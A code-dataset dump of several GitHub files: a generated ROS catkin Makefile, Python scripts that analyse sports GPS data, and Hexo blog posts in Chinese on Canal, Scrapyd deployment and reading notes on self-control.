basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nsensor_msgs_generate_messages_eus: basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/rule\n.PHONY : sensor_msgs_generate_messages_eus\n\n# fast build rule for target.\nsensor_msgs_generate_messages_eus/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/build\n.PHONY : sensor_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/rule\n.PHONY : basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nsensor_msgs_generate_messages_lisp: basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/rule\n.PHONY : sensor_msgs_generate_messages_lisp\n\n# fast build rule for target.\nsensor_msgs_generate_messages_lisp/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/build\n.PHONY : sensor_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/rule\n.PHONY : basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nsensor_msgs_generate_messages_py: basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/rule\n.PHONY : sensor_msgs_generate_messages_py\n\n# fast build rule for target.\nsensor_msgs_generate_messages_py/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/build\n.PHONY : sensor_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n.PHONY : basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_cpp: basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n.PHONY : std_msgs_generate_messages_cpp\n\n# fast build rule for target.\nstd_msgs_generate_messages_cpp/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/build\n.PHONY : std_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n.PHONY : basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_eus: basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : std_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n.PHONY : basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_lisp: basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n.PHONY : std_msgs_generate_messages_lisp\n\n# fast build rule for target.\nstd_msgs_generate_messages_lisp/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/build\n.PHONY : std_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nbasic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/rule:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f CMakeFiles/Makefile2 basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n.PHONY : basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_py: basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n.PHONY : std_msgs_generate_messages_py\n\n# fast build rule for target.\nstd_msgs_generate_messages_py/fast:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/build\n.PHONY : std_msgs_generate_messages_py/fast\n\nsrc/depth_stream_stabilizer.o: src/depth_stream_stabilizer.cpp.o\n.PHONY : src/depth_stream_stabilizer.o\n\n# target to build an object file\nsrc/depth_stream_stabilizer.cpp.o:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build.make basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/src/depth_stream_stabilizer.cpp.o\n.PHONY : src/depth_stream_stabilizer.cpp.o\n\nsrc/depth_stream_stabilizer.i: src/depth_stream_stabilizer.cpp.i\n.PHONY : src/depth_stream_stabilizer.i\n\n# target to preprocess a source file\nsrc/depth_stream_stabilizer.cpp.i:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build.make basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/src/depth_stream_stabilizer.cpp.i\n.PHONY : src/depth_stream_stabilizer.cpp.i\n\nsrc/depth_stream_stabilizer.s: src/depth_stream_stabilizer.cpp.s\n.PHONY : src/depth_stream_stabilizer.s\n\n# target to generate assembly for a file\nsrc/depth_stream_stabilizer.cpp.s:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build.make basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/src/depth_stream_stabilizer.cpp.s\n.PHONY : src/depth_stream_stabilizer.cpp.s\n\nsrc/predictive_director.o: src/predictive_director.cpp.o\n.PHONY : src/predictive_director.o\n\n# target to build an object file\nsrc/predictive_director.cpp.o:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/predictive_director.dir/build.make basic_teleop/CMakeFiles/predictive_director.dir/src/predictive_director.cpp.o\n.PHONY : src/predictive_director.cpp.o\n\nsrc/predictive_director.i: src/predictive_director.cpp.i\n.PHONY : src/predictive_director.i\n\n# target to preprocess a source file\nsrc/predictive_director.cpp.i:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/predictive_director.dir/build.make basic_teleop/CMakeFiles/predictive_director.dir/src/predictive_director.cpp.i\n.PHONY : src/predictive_director.cpp.i\n\nsrc/predictive_director.s: src/predictive_director.cpp.s\n.PHONY : src/predictive_director.s\n\n# target to generate assembly for a file\nsrc/predictive_director.cpp.s:\n\tcd /home/will/catkin_ws/build && $(MAKE) -f basic_teleop/CMakeFiles/predictive_director.dir/build.make basic_teleop/CMakeFiles/predictive_director.dir/src/predictive_director.cpp.s\n.PHONY : src/predictive_director.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... _basic_teleop_generate_messages_check_deps_Move\"\n\t@echo \"... basic_teleop_gencpp\"\n\t@echo \"... basic_teleop_generate_messages\"\n\t@echo \"... basic_teleop_generate_messages_cpp\"\n\t@echo \"... basic_teleop_generate_messages_eus\"\n\t@echo \"... basic_teleop_generate_messages_lisp\"\n\t@echo \"... basic_teleop_generate_messages_py\"\n\t@echo \"... basic_teleop_geneus\"\n\t@echo \"... basic_teleop_genlisp\"\n\t@echo \"... basic_teleop_genpy\"\n\t@echo \"... depth_stream_stabilizer\"\n\t@echo \"... edit_cache\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... install\"\n\t@echo \"... install/local\"\n\t@echo \"... install/strip\"\n\t@echo \"... list_install_components\"\n\t@echo \"... predictive_director\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... sensor_msgs_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_eus\"\n\t@echo \"... sensor_msgs_generate_messages_lisp\"\n\t@echo \"... sensor_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... test\"\n\t@echo \"... src/depth_stream_stabilizer.o\"\n\t@echo \"... src/depth_stream_stabilizer.i\"\n\t@echo \"... src/depth_stream_stabilizer.s\"\n\t@echo \"... src/predictive_director.o\"\n\t@echo \"... src/predictive_director.i\"\n\t@echo \"... src/predictive_director.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/will/catkin_ws/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 59,
"blob_id": "e5e62060bb68722a360a6af8a1e97b7778079390",
"content_id": "c489fb1a93722e1a0474da71c36ab8751bce4ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 2,
"path": "/build/basic_teleop/catkin_generated/basic_teleop-msg-extras.cmake.develspace.in",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "set(basic_teleop_MESSAGE_FILES \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\")\nset(basic_teleop_SERVICE_FILES \"\")\n"
}
] | 22 |
magickaiyang/archive | https://github.com/magickaiyang/archive | 9eb5c7d82a71aa0eeb10829c26e8cd5a91e6bfc9 | 594e18a53b97c3b3bd422450a9d6903f6f33b9c2 | 81082d9d3f1a033d3af26a63f45c96091502e81e | refs/heads/master | 2020-06-28T17:23:38.039043 | 2019-08-02T21:07:18 | 2019-08-02T21:07:18 | 200,295,713 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.45500847697257996,
"alphanum_fraction": 0.4745331108570099,
"avg_line_length": 33.64706039428711,
"blob_id": "867405ee79e1fd92b0cb07870bf3fa968fcfe41c",
"content_id": "1cee90d276cbafd52ec1dad19ef7c586fcf99ddc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 34,
"path": "/datafest/intense_event.py",
"repo_name": "magickaiyang/archive",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\n\ndef build(gps, game_id):\n players = []\n\n for i in gps.PlayerID.unique():\n counter = 0\n prev_a = 0.0\n\n for j in range(1, 3):\n for k in gps[(gps.PlayerID == i) & (gps.Half == j)].FrameID.values: # first half second half\n ax = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelX)[0]\n ay = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelY)[0]\n az = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelZ)[0]\n a = ax ** 2 + ay ** 2 + az ** 2\n\n if (prev_a > 5.0 and a < 5.0) or (prev_a < 5.0 and a > 5.0):\n counter += 1\n prev_a = a\n\n players.append({'GameID': game_id, 'PlayerID': i, 'IntenseEvents': counter})\n\n return players\n\n\nif __name__ == '__main__':\n df = pd.read_csv('gps.csv')\n for i in df.GameID.unique():\n if i > 3:\n print('game{0}.csv'.format(i))\n game_df = df[df.GameID == i]\n count_df = pd.DataFrame(build(game_df, i))\n count_df.to_csv('game{0}.csv'.format(i))\n"
},
{
"alpha_fraction": 0.6610360145568848,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 34.52000045776367,
"blob_id": "e0e4b559d4be841a113114a461615116f66210a9",
"content_id": "8ec418ca4df4be9bb095531cc8d5a0f61822f360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 888,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 25,
"path": "/datafest/plot.py",
"repo_name": "magickaiyang/archive",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n# Create new Figure and an Axes which fills it.\nfig = plt.figure(figsize=(27, 27))\nax = fig.add_axes([0, 0, 1, 1], frameon=False)\nax.margins(x=-0.001, y=-0.001)\n\ngps = pd.read_csv('gps_filtered.csv').sort_values(by='PlayerID')\n# gps = gps[gps.Half == 1]\n\nscat = ax.scatter(gps[gps.FrameID == 1]['Longitude'], gps[gps.FrameID == 1]['Latitude'], s=150, color='red', alpha=0.5)\n\n\ndef update(frame_number):\n # print(frame_number)\n # Update the scatter collection, with the new positions\n scat.set_offsets(gps[gps.FrameID == frame_number][['Longitude', 'Latitude']])\n\n\n# Construct the animation, using the update function as the animation director.\nani = animation = FuncAnimation(fig, update, interval=50, save_count=5000) # 0.1s\nani.save('game_viz.mp4', bitrate=1000)\n# plt.show()\n"
}
] | 2 |
polarisary/hexoblog | https://github.com/polarisary/hexoblog | 3eb2e96565821574432eaacb49caa07e07b9e643 | bddc2a139235fe26d808c82c3f22c2b02641e155 | 47488861a2b895767e7015f707515aa770df8d03 | refs/heads/master | 2023-03-05T01:37:35.366294 | 2019-07-28T14:06:43 | 2019-07-28T14:06:43 | 118,543,760 | 0 | 0 | null | 2018-01-23T02:09:25 | 2019-07-28T14:07:10 | 2022-12-06T20:21:34 | CSS | [
{
"alpha_fraction": 0.42794761061668396,
"alphanum_fraction": 0.6215429306030273,
"avg_line_length": 9.584615707397461,
"blob_id": "705df7c6bd4c2c60c473ee1ee6c3dbf2fd2949e4",
"content_id": "5aa91788e4cdb4630cf95df72563816b190254ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 65,
"path": "/source/about/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 关于读书\ndate: 2018-06-09 21:34:24\ncomments: false\n---\n\n### 在读书目\n\n- 技术\n\n\t> 《极客时间 - 技术领导力300讲》\n >\n > 《Java核心技术 第10版 卷I》\n\n- 研究项目\n\n\t> Alibaba - Canal\n\n- 非技术\n\n\t> 《思考,快与慢》\n\t>\n\t> 《清醒思考的艺术》\n\t>\n\t> 《叛逆不是孩子的错》\n\t>\n\t> 《股市真规则》\n\n### 已读书目\n\n《图灵程序设计丛书:图解HTTP》 2018.1\n\n《异类-用软实力思维解决人生发展问题》 2018.2~2018.3\n\n《极客时间 - 邱岳的产品手记》 2018.3\n\n《极客时间 - 朱赟的技术管理课》 2018.4\n\n《极客时间 - 从0开始学架构》 2018.4~2018.8\n\n《见识:商业的本质和人生的智慧》 2018.5\n\n《增长黑客》 2018.5~2018.6\n\n《绝对自控》 2018.6\n\n《软技能:代码之外的生存指南》 2018.3~2018.7\n\n《libevent深入浅出》 2018.7\n\n《练习的心态:如何培养耐心、专注和自律》 2018.7\n\n《异类:不一样的成功启示录》 2018.8\n\n《MySQL技术内幕-InnoDB存储引擎-第二版》 2018.10\n\n《极客时间 - 左耳听风》 2019.3\n\n《极客时间 - 技术管理实战36讲》 2019.4\n\n《技术管理之巅》 2019.5\n\n《富爸爸穷爸爸》 2019.5\n\n《小狗钱钱》 2019.6"
},
{
"alpha_fraction": 0.7851083874702454,
"alphanum_fraction": 0.806786060333252,
"avg_line_length": 26.947368621826172,
"blob_id": "560c21e7486acee8ceaa46b877e586abf46ec53c",
"content_id": "9c6e32c6161a342fbebe7ee4700757126c08a1f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1883,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 38,
"path": "/source/_posts/canal-01.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列01-整体介绍\ndate: 2019-05-16 18:29:58\ncategories: Canal系列\ntags: [canal]\n---\n\n## 一、项目定位及应用场景\nCanal是使用java开发的基于数据库增量日志解析,提供增量数据订阅&消费,目前主要支持mysql。目前我们主要使用Canal接收MySQL的binlog,从而构建数据库中数据的变更历史,供业务方使用。\n\n## 二、工作原理\n\n- 1)canal模拟mysql slave的交互协议,伪装自己为mysql slave,向mysql master发送dump协议\n- 2)mysql master收到dump请求,开始推送binary log给slave(也就是canal)\n- 3)canal解析binary log对象(原始为byte流)\n\n## 三、架构\n\n其中server代表一个canal运行实例,对应于一个jvm,instance对应于一个数据通道 (1个server对应1..n个instance)\ninstance模块:\n- eventParser (数据源接入,模拟slave协议和master进行交互,协议解析)\n- eventSink (Parser和Store链接器,进行数据过滤,加工,分发的工作)\n- eventStore (数据存储)\n- metaManager (增量订阅&消费信息管理器)\n\n## 四、源码结构\n\nCanal的源代码如架构图中所示,分为server、parse、sink、store、meta、protocol等\n- server主要提供Http服务,client通过Http与server交互\n- instance代表一个数据通道,包括:\n - parse模块,主要负责解析master推送的binlog\n - sink模块,对解析后的binlog进行过滤,路由分发、归并、加工等\n - store模块,主要为sink加工后的数据提供存储\n - meta模块,提供instance级别的消费位点持久化\n\nprotocol模块,提供数据库相关协议支持,目前主要是MySQL\nprometheus模块,主要提供对Canal的监控\ndeployer模块是Canal的主模块,提供打包部署,启动等等"
},
{
"alpha_fraction": 0.7497879266738892,
"alphanum_fraction": 0.7705682516098022,
"avg_line_length": 23.30927848815918,
"blob_id": "1c5066871f019e2fcdd45e98b1020e719d577d52",
"content_id": "c2d6a61033928720a1d064f957c7f4f39e751c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3282,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 97,
"path": "/source/_posts/scrapyd-deploy.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 使用Scrapyd部署爬虫\ndate: 2018-05-30 22:56:17\ncategories: 爬虫\ntags: [Spider, Scrapy, Scrapyd]\n---\n\n### 一、概念\nScrapyd是可以运行Scrapy爬虫的服务,允许我们部署Scrapy项目并且可以使用Http来控制爬虫。Scrapyd能够管理多个项目,并且每个项目可以有多个版本,但只有最新的版本才是有效的。\nScrapyd-client是Scrapyd的客户端,主要提供一种部署Scrapy项目到Scrapyd服务端的工具。\n\n### 二、部署方式\n开发环境部署Scrapyd-client\n```\npip install scrapyd-client\n```\n线上服务器部署Scrapyd\n```\npip install scrapyd\n```\n\n### 三、配置\nScrapyd安装完成后,在/etc/scrapyd目录下,生成配置文件scrapyd.conf,内容如下:\n\n```\n[scrapyd]\neggs_dir = eggs\nlogs_dir = logs\nitems_dir =\njobs_to_keep = 5\ndbs_dir = dbs\nmax_proc = 0\nmax_proc_per_cpu = 4\nfinished_to_keep = 100\npoll_interval = 5.0\nbind_address = 127.0.0.1\nhttp_port = 6800\ndebug = off\nrunner = scrapyd.runner\napplication = scrapyd.app.application\nlauncher = scrapyd.launcher.Launcher\nwebroot = scrapyd.website.Root\n\n[services]\nschedule.json = scrapyd.webservice.Schedule\ncancel.json = scrapyd.webservice.Cancel\naddversion.json = scrapyd.webservice.AddVersion\nlistprojects.json = scrapyd.webservice.ListProjects\nlistversions.json = scrapyd.webservice.ListVersions\nlistspiders.json = scrapyd.webservice.ListSpiders\ndelproject.json = scrapyd.webservice.DeleteProject\ndelversion.json = scrapyd.webservice.DeleteVersion\nlistjobs.json = scrapyd.webservice.ListJobs\ndaemonstatus.json = scrapyd.webservice.DaemonStatus\n\n```\n\n其中bind_address默认监听本地连接,可以修改成0.0.0.0在公网上访问,默认端口6800.\n### 四、启动Scrapyd:\n\n```\nnohup scrapyd &\n```\n之后就可以使用公网ip:6800访问了,这个是Scrapyd提供的一个简单监控页面。可通过此页面查看Spider、Log等相关信息。\n\n### 五、发布Spider\n开发环境安装好Scrapyd-client后,就可以将开发好的Spider发布上线了。\n首先需要将Scrapy项目中的scrapy.cfg修改下:\n\n```\n[deploy:xxx]\nurl = http://localhost:6800/\nproject = xxx\n```\n其中deploy:xxx代表Scrapyd服务端名称(可随意填写),url代表Scrapyd服务地址,project=xxx代表Scrapy项目名称\n可以使用scrapyd-deploy -l检查配置是否正确,接下来关键的时候到了。\n\n```\nscrapyd-deploy <target> -p <project> --version <version>\n```\n\n将Spider打包发布到Scrapyd服务上,其中<target>与上面配置中deploy对应,<project>同样与上面project对应,<version>指定一个相应的版本号,如果发布成功的话,会有提示说明。\n\n### 六、启动Spider\nSpider发布到Scrapyd服务端后,就可以在任何地方启动Spider的了,执行下面命令启动相应Spider:\n\n```\ncurl http://ip:port/schedule.json -d project=project_name -d spider=spider-name\n```\n\n其中ip:port是Scrapyd服务地址,project_name是要启动的Spider所在项目名称,spider-name是要启动的Spider的名称。\n### 七、停掉Spider\n\n```\ncurl http://ip:port/cancel.json -d project=project-name -d job=jobid\n```\n其中jobid是要停止的Spider的jobid,可以在Scrapyd控制查看到\n"
},
{
"alpha_fraction": 0.7807474732398987,
"alphanum_fraction": 0.7837896347045898,
"avg_line_length": 22.014999389648438,
"blob_id": "2288849a10128c44da35f8a8c3f3047b74bda36f",
"content_id": "0b4352e77fe892b1dc3f1c13dda021d045680a1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12592,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 200,
"path": "/source/_posts/zikong.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 《绝对自控》读书笔记\ndate: 2018-07-05 22:46:17\ncategories: 读书 #文章文类\ntags: [读书] #文章标签,多于一项时用这种格式\n---\n上周读完了美国作家瑞安·霍利迪的《绝对自控》,读完最深刻的就是书中描述“自我”对个人成长、发展的不容忽视的影响。\n求索路上,严控自我;要谦逊、勤勉、自省,从自我中脱离出来,懂得自我批判,知道自我激励,在个人成长的过程中如何处理“自我”,与自己很好的相处。生活不是为了和其他人较劲,意义不在于拥有的比别人更多。生活是做自己,做到极致,不为正轨之外的任何事情而妥协。生活是到达你想到达的彼岸,完成你想完成的最好。仅此而已,不多一点也不少一点。\n\n下面是读书过程的记录的要点:\n\n## 第一部分:求索\n\n### 求索路上,严控自我\n\n> 求索时不急不躁,成功时保持谦虚,失败时得以复原 \n\n> ** 思考的过程一定要慢,行动的开始一定要快 **\n\n> 在“渴望”这个阶段,你必须站在稍远的地方好好看清自己,从自我中脱离出来,谦逊、勤勉和自省。\n\n> 目标要大,但行动要细;看重未来,但活在当下;以行动和求知作为焦点,抛却对地位和他人认可的关注,如此,则野心不再是浮夸的面具,而成为源源不绝的、可再生的动力。一步接一步,学习、成长;不着急,慢慢来。\n\n### 成名还是成事\n\n> 你所做的每件事都会反过来作用于你。\n\n> 如果你的目标大于自我——渴望有所成就,或向自己做出证明——那一切都会瞬间变得既单纯又复杂。单纯在于,你清楚了心之所向,明白什么才是真正重要的事情。\n\n> 我要成就怎样的人生,流连在声名中,何谈成就事业\n\n### 做一名学生\n\n> 所谓百年树人,绝非拔苗助长可实现;既然不能一蹴而就,便只好日复一日辛勤耕耘。如果不按这个方法来,那就只能被逐出师门了。\n\n> 不懂装懂是最危险的一项恶习,凡是沾染上的人都无法企及更好的境界。对此,不断学习和认清自我就是一剂治愈的苦药。\n\n> 像苏格拉底一样自省,承认自己所知甚少。把所在领域的根基消化为己有,连并一切围绕基础而延伸的最新发展,不僵于空间,不困于时间。活到老,学到老。我们就是自己的老师、教练、评论家。\n\n> 好的学生应该像一块海绵,吸收、渗透、抓住身边的所有水分。懂得自我批判,知道自我激励,从不停止学习和思考,能从一个主题跨越到另一个主题,从一个挑战走向另一个挑战。真正的学生就该做自己的老师,批判自身的不足。等到一人身担多职,才发现哪还有空闲的角色分给“自我”?\n\n> 让人惊讶的是,野心十足的大人物反而都为人谦虚。他们尽管自信满满,却一直以学生的身份自居,谦虚而不骄纵。\n\n### 少一点热爱\n\n> 人生哲学是保持掌控,脚踏实地,绝不做“冲动的奴隶”。目标是一个“去自我化”的过程,是超越自我向更高的层次追逐。\n\n> 热爱是形式大于功能。而目标则只关乎功能、功能、功能。\n\n### 画布策略\n\n> 重点并不在于一直给别人铺路,而是要适当支持,助人一臂之力。\n\n> 要像一块海绵一样,吸收身边所有养分,听取所有意见。\n\n> 权力与地位(自我的附属品)简直不费吹灰之力就能毁掉一个大有前途的人。\n\n> 伟大产生于谦逊卑微,来自枯燥乏味的工作。真正成功以前,你永远都是房间里那个最不重要的人,看轻自己,看重工作\n\n> 想想怎么给每个遇到的人添一把力,想想能为别人做点什么。尽管从中得利的人是他们而不是你,但经过日积月累,影响仍不容小觑:你将学会解决各种问题的途径,成为办公室里不可或缺的角色;培养新的关系,为将来可能遇见的难题准备好人际资源。这就是画布策略的精明所在——欲自助,先助人,以短期利益交换长期回报。\n\n> 咬紧牙关,告诉自己每一秒没有花在工作上的时间都是一种浪费,迟早有一天自己可以出人头地,不再看别人脸色?其实啊,等你克服了以上这些冲动情绪后,自然就知道该如何执行策略了。\n\n### 束缚自己\n\n> ** 我所谓的骨气,就是忍 **\n\n> 做不会被自我耽误远大前程的人。小不忍则乱大谋,他心里清楚,有许多股力量试图击败他,摧毁他。可想实现的目标、想完成的任务都明明白白地摆在眼前呢,此刻的忍耐是有价值的。他本不必这样苛求自己,但他确实这样做了。\n\n> ** 自我的征服者都明白一个道理:轻视别人正是羞辱自己。**\n\n> ** 相反,在这个关头,我们什么都不该做。接受他人的冷漠、轻视、鄙夷,把它们囫囵吞下,直吞到恶心反胃为止 **\n\n> 转身继续你的工作,屏蔽所有嘈杂的声音,万万不要让它们影响到你。克制很难,但是必须克制。就算遭遇挑衅又如何?谁也不可能一直忍下去,但此刻我们必须咬紧牙关。\n\n> 成功以前不仅不能妄想改变世界的规则,还要找寻途径让自己的目标契合于这个世界——即使目标不过是多花些时间提升自我,向他人学习并塑造、巩固自身基础。\n\n> 罗宾森也会冲动,也像我们普通人一样会发火,会沮丧。只是他知道自己脚下的这条钢索只容得下克制,容不下自我。\n\n### 摆脱自己\n\n> ** 向生活妥协,尽情享受吧!**\n\n> 你的世界里没有什么观众,有的只是等待完成的工作和预备学习的经验而已。\n\n### 警惕:早产的骄傲\n\n> 年轻的约翰·洛克菲勒养成了每晚跟自己对话的习惯。“你不过是刚刚起步,千万别把自己当成什么了不起的大老板。多看看周围的世界,不要迷失自己!每一步都得踏实地走。”\n\n> 接受反馈、保持饥饿、适当地规划生活\n\n> “自我认识的首要产物便是谦逊。”要想对抗自我,靠的就是真正了解自我。\n\n> ** 现在的我是不是忽视了一些本该看到的东西?我在歇斯底里、暴躁狂怒的同时是不是也在逃避些什么?”此时正是扪心自问的最好时机,因为你需要付出的代价还远远算不上高昂。**\n\n> ** 沉默并不代表不骄傲。** “你所引以为傲的就是你最危险的软肋。不管什么时候,都不要骄傲,不要吹嘘。\n\n### 拼、拼、拼\n\n> 请记住,拼、拼、拼,永远地拼命做下去吧。\n\n> **只要记得,眼前还有很长很长的路就足够了,成功靠的从来都不是智慧,而是持之以恒的努力。**\n\n> **没有实现不了的梦想——只要我们耐住性子,戒骄戒躁,只要我们还有孤注一掷的勇气。**\n\n> 工作的意义就在于别人因疾风骤雨闭门不出时,你却依然跋涉;别人在赶制初稿模型的乏味中退缩,你却依然坚持;别人在欢呼赞美中放慢脚步,你却依然加速。你不需要做到最好,因为你注定会做到最好。\n\n### 不管未来几何,严控自我\n\n> 